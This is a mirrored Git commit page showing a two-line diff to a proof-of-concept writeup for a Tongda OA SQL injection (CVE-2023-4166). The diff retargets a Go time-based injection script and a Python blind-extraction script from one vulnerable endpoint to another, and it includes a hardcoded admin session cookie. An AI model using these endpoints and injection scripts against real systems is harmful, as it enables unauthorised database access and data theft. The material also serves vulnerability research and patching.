admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update 通达OA sql注入漏洞 CVE-2023-4166.md

Browse Source
This commit is contained in:
wy876 2023-11-04 22:26:08 +08:00 committed by GitHub
parent 16d885872f
commit 96128a6dfc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
通达OA sql注入漏洞 CVE-2023-4166.md
View File

@ -36,7 +36,7 @@ import (
// 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞 // 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞
func main() { func main() {
// /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1 general/system/seal_manage/dianju/delete_log.php // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1 general/system/seal_manage/dianju/delete_log.php
url := "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php" // 目标网站的URL url := "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php" // 目标网站的URL
delay := 2 // 延迟时间,单位为秒 delay := 2 // 延迟时间,单位为秒
cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值 cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值
@ -106,7 +106,7 @@ headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin;
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-" characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-"
url = "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=" url = "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php?DELETE_STR="
result = "" result = ""